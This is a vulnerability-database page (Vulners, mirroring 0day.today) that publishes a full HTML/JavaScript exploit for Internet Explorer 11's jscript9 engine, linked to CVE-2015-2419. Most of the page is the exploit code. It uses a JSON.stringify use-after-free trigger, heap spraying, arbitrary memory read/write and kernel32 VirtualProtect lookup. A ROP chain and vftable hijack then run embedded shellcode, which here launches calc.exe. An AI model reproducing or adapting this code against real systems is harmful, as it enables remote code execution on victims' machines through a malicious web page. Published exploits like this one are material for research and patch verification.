Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Internet Explorer 11 #InternetExplorer #IE - javascript Code Execution Exploit

🗓️ 24 May 2018 00:00:00Reported by checkpointType 
zdt
 zdt🔗 0day.today👁 74 Views

Microsoft Internet Explorer 11 - JavaScript Code Executio

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2015-2419
14 Jul 201500:00
attackerkb
BDU FSTEC		The vulnerability of the Internet Explorer browser, which allows a hacker to execute arbitrary code or trigger a service failure.
31 Jul 201500:00
bdu_fstec
Circl		CVE-2015-2419
15 Oct 201522:07
circl
CISA KEV Catalog		Microsoft Internet Explorer Memory Corruption Vulnerability
28 Mar 202200:00
cisa_kev
CNVD		Microsoft Internet Explorer Denial of Service Vulnerability (CNVD-2015-04689)
16 Jul 201500:00
cnvd
Check Point Advisories		Microsoft Internet Explorer Jscript9 Memory Corruption (MS15-065: CVE-2015-2419)
14 Jul 201500:00
checkpoint_advisories
Check Point Advisories		Microsoft Internet Explorer Memory Corruption (CVE-2015-2419)
21 Sep 202000:00
checkpoint_advisories
CVE		CVE-2015-2419
14 Jul 201521:00
cve
Cvelist		CVE-2015-2419
14 Jul 201521:00
cvelist
FireEye		Hiking Club Malvertisements Drop Monero Miners Via Neptune Exploit Kit
22 Aug 201710:00
fireeye
Rows per page
<html>
<body>
<script>
ARR_SIZE = 3248;
first_gadget_offsets = [150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476];
stackpivot_gadget_offsets = [122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542];
first_gadget = [0x89, 0x41, 0x0c, 0xc3];
stackpivot_gadget = [0x94, 0xc3];
gadget_offsets = {"stackpivot": 0, "g1": 0, "g2": 0};
 
function empty_replacer(a,b) {
    return b;
}
 
function create_list(lst, depth) {
    if (depth > 5)
    {
        return;
    }
    else
    {
        // Creates 19 objects in each nested list
        for (i = 0; i <= 19; i++)
        {
            // Create random string with length 8
            for (var val = "", c = 0; c <= 8; c++) {
                rnd = Math.floor((Math.random() * 90) + 48);
                l = String.fromCharCode(rnd);
                val = val + l;
            }
            lst["a" + i] = val;
        }
        create_list(lst["a0"] = {}, depth + 1);
    }
}
 
function create_triggering_json() {
    var lst = {}
    create_list(lst, 0);
    return lst;
}
 
// Create vulnerable JSON
trig_json = create_triggering_json();
 
spray = new Array(4096);
buff = new ArrayBuffer(4);
size = 0;
 
// Heap Spray
var I = setInterval(function(){     
    for (i=0;i<400;i++,size++) {
        spray[size] = new Array(15352);
        for (j = 0; j< 85;j++) {
            spray[size][j] = new Uint32Array(buff);
        }
        0 == i && (yb = spray[0][0]["length"], yb["toString"](16))
    }
     
    size >= (4096) && (clearInterval(I), uaf())    
}, 100);
 
var arr = []
function uaf()
{
    JSON.stringify(trig_json,empty_replacer);
     
    var pattern = [311357464,311357472,311357464];  
    for (var b = 3248 * 2, c = 203; c < b; c++)
        arr[c] = new ArrayBuffer(12);
         
    for (c = 203; c < b; c++)
    {
        var data = new Uint32Array(arr[c],0);
        a = 0;
        for (var i = data["length"] / pattern["length"]; a < i; a++)
            for (var d=0, e = pattern["length"]; d < e;d++) 
                data[a+d] = pattern[d];
 
    }
 
    CollectGarbage();
 
    search_corrupted_array();
}
 
var damaged_array;
function search_corrupted_array()
{
    for (i=0;i<4096;i++) 
    {
        for (j = 0; j< 85;j++) {
            if (spray[i][j].length != 1)
            {
                damaged_array = spray[i][j];
                damaged_array[1] = 0x7fffffff; // Set array to include almost entire user-space
                damaged_array[2] = 0x10000;
                 
                write_dword_to_addr(damaged_array, 0x128e0020, 0xDEC0DE * 2 | 1); // Mark the first element of one of the arrays, to find it later
                for (k = 0; k < 4096; k++) { // find the marked array
                    if (spray[k][0] == 0xDEC0DE) {
                        break;
                    }
                }
                // now spray[k][0] is 0x128e0020
                if (k == 4096) break;
                spray[k][2] = new Array(1); // creates a native integer array, pointed by 0x128e0028
                spray[k][2][0] = new ArrayBuffer(0xc); // turns the array to be JavascriptArray
                arr_obj = read_dword_from_addr(damaged_array, 0x128e0028); // address of the new JavascriptArray object
                jscript9_base_addr = read_dword_from_addr(damaged_array, arr_obj) & 0xffff0000; // read the first dword of the JavascriptArray object, which is the vftable pointer, null the lower word to get jscript9 base address
                vp_addr = get_vp_addr(damaged_array, jscript9_base_addr); // virtual address of kernel32!VirtualProtectStub
                if (vp_addr == 0) break;
                arrbuf = new ArrayBuffer(0x5000); // this buffer will contain the ROP chain
                spray[k][0] = new Uint32Array(arrbuf); // Uint32Array that is a view to the arraybuffer above, pointed by 0x128e0020
                rc_buf_ui32_obj = read_dword_from_addr(damaged_array, 0x128e0020); // address of the Uint32Array object
                rc_buf_ui32_data = read_dword_from_addr(damaged_array, rc_buf_ui32_obj + 0x20); // address of first element of Uint32Array above
                var shellcode_caller = [0x53, 0x55, 0x56, 0xe8, 0x09, 0x00, 0x00, 0x00, 0x5e, 0x5d, 0x5b, 0x8b, 0x63, 0x0c, 0xc2, 0x0c, 0x00, 0x90];
                var shellcode = [96, 49, 210, 82, 104, 99, 97, 108, 99, 84, 89, 82, 81, 100, 139, 114, 48, 139, 118, 12, 139, 118, 12, 173, 139, 48, 139, 126, 24, 139, 95, 60, 139, 92, 31, 120, 139, 116, 31, 32, 1, 254, 139, 84, 31, 36, 15, 183, 44, 23, 66, 66, 173, 129, 60, 7, 87, 105, 110, 69, 117, 240, 139, 116, 31, 28, 1, 254, 3, 60, 174, 255, 215, 88, 88, 97, 195]; // open calc.exe shellcode
                spray[k][1] = new Uint8Array(shellcode_caller.concat(shellcode)); // shellcode, pointed by 0x128e0024
                sc_obj = read_dword_from_addr(damaged_array, 0x128e0024); // address of the Uint8Array object containing the shellcode
                sc_data = read_dword_from_addr(damaged_array, sc_obj + 0x20); // address of the shellcode buffer itself
                construct_gadget_dict(damaged_array, jscript9_base_addr);
                 
                // construct the ROP chain
                spray[k][0][0] = jscript9_base_addr + gadget_offsets["g1"]; // mov dword ptr [ecx+0c], eax # ret
                spray[k][0][1] = jscript9_base_addr + gadget_offsets["g2"]; // ret
                spray[k][0][2] = vp_addr; // VirtualProtectStub pointer
                spray[k][0][3] = sc_data; // shellcode address (return address to which we return after VirtualProtect)
                spray[k][0][4] = sc_data; // lpAddress
                spray[k][0][5] = spray[k][1].length; // dwSize
                spray[k][0][6] = 0x40; // flNewProtect = PAGE_EXECUTE_READWRITE
                spray[k][0][7] = rc_buf_ui32_data + 0x20; // lpflOldProtect
                spray[k][0][0x90 / 4] = jscript9_base_addr + gadget_offsets["stackpivot"]; // stackpivot gadget in offset 0x90 from ROP chain top
                write_dword_to_addr(damaged_array, arr_obj, rc_buf_ui32_data); // overwrite the JavascriptArray object's vftable pointer with the address of the ROP chain
                spray[k][2][0] = 0; // set the first item of the overwritten JavascriptArray object, triggering the call to JavascriptArray::SetItem. since the vftable is now the ROP chain, and SetItem is in offset 0x90 in the original vftable, this will trigger the stackpivot gadget
            }
        }
    }
}
 
function get_index_from_addr(addr) {
    return Math.floor((addr - 0x10000) / 4);
}
 
function get_iat_offset(arr, js9_base) {
    return 0x3e6000;
}
 
function get_pe_header_offset(arr, js9_base) {
    var offset = read_dword_from_addr(arr, js9_base + 0x3c);
    return offset;
}
 
function get_import_table_offset(arr, js9_base) {
    var pe_header_offset = get_pe_header_offset(arr, js9_base);
    var pe_header = js9_base + pe_header_offset;
    var import_table_offset = read_dword_from_addr(arr, pe_header + 0x80);
    return import_table_offset;
}
 
function get_import_table_size(arr, js9_base) {
    var pe_header_offset = get_pe_header_offset(arr, js9_base);
    var pe_header = js9_base + pe_header_offset;
    var import_table_size = read_dword_from_addr(arr, pe_header + 0x84);
    return import_table_size;
}
 
function get_vp_addr(arr, js9_base) {
    var kernel32_entry = get_kernel32_entry(arr, js9_base);
    var string_pointers_offset = read_dword_from_addr(arr, kernel32_entry - 0xc);
    var function_pointers_offset = read_dword_from_addr(arr, kernel32_entry + 0x4);
    var func_name = new String();
    for (fptr = js9_base + function_pointers_offset, sptr = js9_base + string_pointers_offset; fptr != 0 && sptr != 0; fptr += 4, sptr += 4) {
        func_name = read_string_from_addr(arr, js9_base + read_dword_from_addr(arr, sptr) +2);
        if (func_name.indexOf("VirtualProtect") > -1) {
            return read_dword_from_addr(arr, fptr);
        }
    }
    return 0;
}
 
function get_kernel32_entry(arr, js9_base) {
    var it_addr = js9_base + get_import_table_offset(arr, js9_base);
    var it_size = get_import_table_size(arr, js9_base);
    var s = new String();
    for (var next_addr = it_addr + 0xc; next_addr < js9_base + it_addr + it_size; next_addr += 0x14) {
        var it_entry = read_dword_from_addr(arr, next_addr);
        if (it_entry != 0) {
            s = read_string_from_addr(arr, js9_base + it_entry);
            if (s.indexOf("KERNEL32") > -1 || s.indexOf("kernel32") > -1) {
                return next_addr;
            }
        }
    }
    return 0;
}
 
function read_dword_from_addr(arr, addr) {
    return arr[get_index_from_addr(addr)];
}
 
function read_byte_from_addr(arr, addr) {
    var mod = addr % 4;
    var ui32 = read_dword_from_addr(arr, addr);
    return ((ui32 >> (mod * 8)) & 0x000000ff);
     
}
 
function read_string_from_addr(arr, addr) {
    var s = new String();
    var i = 0;
    for (i = addr, c = "stub"; c != String.fromCharCode(0); i++) {
        c = String.fromCharCode(read_byte_from_addr(arr, i));
        s += c;
    }
    return s;
}
 
function write_dword_to_addr(arr, addr, data) {
    arr[get_index_from_addr(addr)] = data;
}
 
function find_gadget_offset(arr, js9_base, offsets, gadget, gadget_key) {
    var first_dword = 0x0, second_dword = 0x0, g = 0;
    var gadget_candidate = [];
    for (g = 0; g < offsets.length; g++) {
        first_dword = read_dword_from_addr(arr, js9_base + offsets[g]);
        second_dword = read_dword_from_addr(arr, js9_base + offsets[g] + 4);
         
        gadget_candidate = convert_reverse_ui32_to_array(first_dword);
        gadget_candidate = gadget_candidate.concat(convert_reverse_ui32_to_array(second_dword));
         
        if (contains_gadget(gadget_candidate, gadget)) {
            gadget_offsets[gadget_key] = offsets[g];
            break;
        }
    }
}
 
function construct_gadget_dict(arr, js9_base) {
    find_gadget_offset(arr, js9_base, first_gadget_offsets, first_gadget, "g1");
    find_gadget_offset(arr, js9_base, stackpivot_gadget_offsets, stackpivot_gadget, "stackpivot");
    if (gadget_offsets["stackpivot"] > 0) {
        gadget_offsets["g2"] = gadget_offsets["stackpivot"] + 1;
    }
}
 
function contains_gadget(arr, sub) {
    var i = 0;
    for (i = 0; i < sub.length; i++) {
        if (arr.indexOf(sub[i]) == -1) return false;
    }
    return true;
}
 
function convert_reverse_ui32_to_array(ui32) {
    var arr = [];
    var i = 0;
    var tmp = ui32;
    for (i = 0; i < 4; i++, tmp = tmp >> 8) {
        arr.push(tmp & 0x000000ff);
    }
    return arr;
}
</script>
</body>
</html>

#  0day.today [2018-05-24]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 May 2018 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.49527
vulnerabilityexploitjavascriptheap spraybuffer overflowkernel32.
74